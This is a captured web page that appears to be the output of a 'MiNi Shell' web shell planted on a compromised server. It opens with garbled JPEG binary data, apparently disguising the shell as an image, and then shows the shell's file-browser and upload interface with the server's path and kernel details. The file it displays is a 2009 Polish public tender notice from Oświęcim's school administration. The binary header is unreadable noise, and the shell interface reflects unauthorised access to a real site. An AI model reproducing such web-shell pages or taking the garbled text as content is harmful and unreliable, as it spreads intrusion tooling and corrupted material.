JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090917/322432-N-2009.html

<p class="kh_header"><b>Oświęcim: Zrealizowanie kampanii informacyjno-promocyjnej oraz wykonanie monitoringu i ewaluacji na potrzeby projektu: Z edukacją na TAK.</b><br>
<b>Numer ogłoszenia: 322432 - 2009; data zamieszczenia: 17.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Szkół i Przedszkoli Miejskich , ul. Królowej Jadwigi 12a, 32-602 Oświęcim, woj. małopolskie, tel. 033 8423963, faks 033 8422505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsipm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Miejska Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zrealizowanie kampanii informacyjno-promocyjnej oraz wykonanie monitoringu i ewaluacji na potrzeby projektu: Z edukacją na TAK..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zasady realizacji przedmiotu zamówienia

Przedmiot zamówienia realizowany będzie na potrzeby projektu: Z edukacją na TAK. Usługa zostanie wykonana zgodnie z poniższymi zapisami:

a)	Zapisami wniosku o dofinansowanie projektu - treść wniosku znajduje się do wglądu dla wykonawców w siedzibie zamawiającego w godzinach pracy Zamawiającego tj. od poniedziałku do piątku (z wyłączeniem świąt) w godzinach 8:00- 15:00 w siedzibie Zamawiającego w sekretariacie. Zamawiający zaleca aby wykonawcy ubiegający się o udzielenie zamówienia zapoznali się z treścią wniosku o dofinansowanie projektu 
b)	umowy o dofinansowanie zawartej przez zamawiającego z Instytucją wdrażającą  - treść umowy znajduje się do wglądu dla wykonawców w siedzibie zamawiającego w godzinach pracy Zamawiającego tj. od poniedziałku do piątku (z wyłączeniem świąt) w godzinach 8:00 - 15:00 w sekretariacie- Zamawiający zaleca aby wykonawcy ubiegający się o udzielenie zamówienia zapoznali się z treścią umowy o dofinansowanie projektu 
c)	odpowiednimi wytycznymi odnoszącymi się do realizacji projektów w ramach POKL 
d)	wytycznymi właściwej Instytucji Wdrażającej
e)	Wykonawca będzie realizował usługę w ścisłej współpracy i pod nadzorem Kierownika Projektu, który określi zasady współpracy, a także procedury które będą stanowiły ramy dla działań Wykonawcy
f)	Wykonawca zobligowany jest do udziału w spotkaniach Zespołu Projektowego organizowanych przez Kierownika Projektu, będą się one odbywały w zależności od potrzeby, jednak nie mniej niż raz na miesiąc. O każdorazowym miejscu i terminie, Wykonawca będzie informowany przez Kierownika Projektu na minimum 2 dni przed wyznaczonym dniem spotkania
g)	Wykonawca zobowiązuje się być dyspozycyjny na potrzeby realizacji projektu w dni od poniedziałku do piątku (z wyłączeniem świąt), w siedzibie biura projektu oraz w miejscach realizacji projektu, na żądanie Zamawiającego w ciągu trzech godzin od otrzymania informacji od Kierownika Projektu

2.	Wytyczne dotyczące realizacji kampanii promocyjno - informacyjnej:

Kampania ma na celu zarówno promocję projektu jak i rozpowszechnienie informacji o jego realizacji wśród grupy docelowej, z terenu objętego zasięgiem realizacji projektu. Ma ona przyczynić się do zrekrutowania do udziału w projekcie BO. Promocja będzie realizowana w oparciu o materiały promocyjno-informacyjne przekazane przez Zamawiającego i będzie polegała na kolportażu plakatów promocyjno-informacyjnych, ulotek promocyjnych, rozmieszczeniu standów promocyjnych i tablic informacyjnych na terenie szkół objętych projektem oraz w biurze projektu. W ramach kampanii promocyjno-informacyjnej przewidziane jest opracowanie 5 ogłoszeń prasowych na temat realizacji projektu oraz realizacja konferencji informacyjnej oraz podsumowującej projekt i jego rezultaty. 

3.	Wytyczne dotyczące realizacji usługi monitoringu i ewaluacji:

Wykonawca na bieżąco będzie prowadzić monitoring projektu: zgodność z harmonogramem  i budżetem, badanie postępu rzeczowego i finansowego. 

Do zadań związanych z ewaluacją należą: przeprowadzenie ankiet i ich analiza: opracowanie ankiet wstępnych, w trakcie realizacji zajęć i na zakończenie projektu, zarówno twardych jak i miękkich. Ankiety będą adekwatne do rodzaju oferowanych zajęć przez szkoły (inne na zajęcia dydaktyczno-wyrównawcze, inne na zajęcia pozalekcyjne a inne na doradztwo). Przy tworzeniu ankiet wykonawca będzie konsultować się z nauczycielami, pedagogami, psychologami, zaangażowanymi w realizację projektu. Ankiety badające postęp naukowy na zajęcia dydaktyczno-wyrównawcze i pozalekcyjne będą przeprowadzane raz na dwa miesiące. 
Przygotowanie sprawozdawczości: wykonawca będzie zbierać dane od każdego z asystentów projektu w każdej ze szkół oraz od specjalistów ds. rozliczeń. Na podstawie tych danych sporządzany będzie całościowy wniosek o płatność (w części rzeczowej) wraz z wymaganymi załącznikami, w tym PEFS. Przygotowanie dokumentów rekrutacyjnych i nadzorowanie działań związanych z procesem rekrutacji (weryfikacja formularzy pod względem formalnym)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY ICH SPEŁNIANIA:
1.	O udzielenie zamówienia publicznego ubiegać się mogą Wykonawcy spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
2.	Wykonawcy biorący udział w postępowaniu muszą spełnić następujące warunki i potwierdzić ich spełnienie wskazanymi w SIWZ dokumentami:
2.1	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają taki obowiązek;
2.2	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, co oznacza że:
- posiada doświadczenie w realizacji samodzielnie lub w partnerstwie z należytą starannością, co najmniej czterech projektów współfinansowanych ze środków unijnych w ramach ZPORR, SPO RZL lub POKL, o łącznej minimalnej liczbie 1900 BO;

2.3	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
2.4	Dysponują przynajmniej trzema osobami zarejestrowanymi w KSU prowadzonym przez Polską Agencję Rozwoju Przedsiębiorczości
2.5	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.6	Przedstawiciel Wykonawcy musi być dyspozycyjny w godz. od 08:00 - 16:00 w dni robocze, w siedzibie biura projektu bądź w miejscach realizacji projektu (w zależności od potrzeb związanych z realizacją projektu) w okresie trwania projektu w siedzibie biura projektu, na żądanie Zamawiającego w ciągu trzech godzin od otrzymania informacji od Kierownika Projektu
3.	Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana według formuły:spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYKAZ WYMAGANYCH OŚWIADCZEŃ I DOKUMENTÓW
1.	W celu potwierdzenia spełnienia przez Wykonawców wymaganych warunków udziału w postępowaniu do Formularza oferty (Załącznik nr 3 do SIWZ), Wykonawcy muszą dołączyć następujące dokumenty i oświadczenia: 
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
Odpis (zaświadczenie) musi zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy. Wykonawcy, którzy dokonali zmian w zakresie organów zarządzających, które nie są uwidocznione w dokumencie rejestrowym winni złożyć dokumenty potwierdzające powołanie nowych osób w skład organu zarządzającego (np. uchwała w sprawie powołania określonej osoby).
b)	oświadczenie o spełnieniu warunków, określonych w art. 24 ust 1 ustawy (wg wzoru stanowiącego Załącznik nr 2 do SIWZ),
c)	wykaz wykonanych w okresie ostatnich trzech lat, , co najmniej czterech projektów współfinansowanych ze środków unijnych w ramach ZPORR, SPO RZL lub POKL, w których łącznie uczestniczyło minimum 1900 BO , wg wzoru stanowiącego załącznik nr 4. 
d)	oświadczenie potwierdzające, że wymagane projekty tj. minimum cztery, zostały wykonane z należytą starannością, 
e)	dokument lub oświadczenie potwierdzające dysponowanie przynajmniej trzema osobami zarejestrowanymi w KSU prowadzonym przez PARP
f)	oświadczenie o dyspozycyjności zgodnie z pkt 1g) załącznika nr 1 do SIWZ 
2.	W przypadku, gdy o udzielenie zamówienia Wykonawcy ubiegają się wspólnie do oferty należy dołączyć:
a)	pełnomocnictwo do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
b)	dokumenty o których mowa w punkcie 1. lit. od a) do b) SIWZ - każdy ze wspólników,
c)	spełnienie warunku w zakresie doświadczenia zawodowego wspólnicy muszą potwierdzić łącznie dokumentami, o których mowa w punkcie 1. lit. od c) do f) SIWZ.
3.	Jeżeli uprawnienie do składania oświadczeń woli w imieniu Wykonawcy nie wynika bezpośrednio z dokumentów rejestrowych złożonych wraz z ofertą, do oferty należy dołączyć stosowne pełnomocnictwo.
4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zobowiązany jest zamiast dokumentów, o których mowa w punkcie 1. lit. a): 
4.1.	lit a): składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
4.2. 	Dokumenty, o których mowa w punkcie 4.1. lit. a) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 4, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
6.	Dokumenty sporządzone w języku obcym, są składane wraz z przetłumaczeniem na język polski potwierdzonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zsipm.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Szkół i Przedszkoli Miejskich
ul. Królowej Jadwigi 12a
32-600 Oświęcim.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2009 godzina 10:30, miejsce: Zarząd Szkół i Przedszkoli Miejskich
ul. Królowej Jadwigi 12a
32-600 Oświęcim  sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com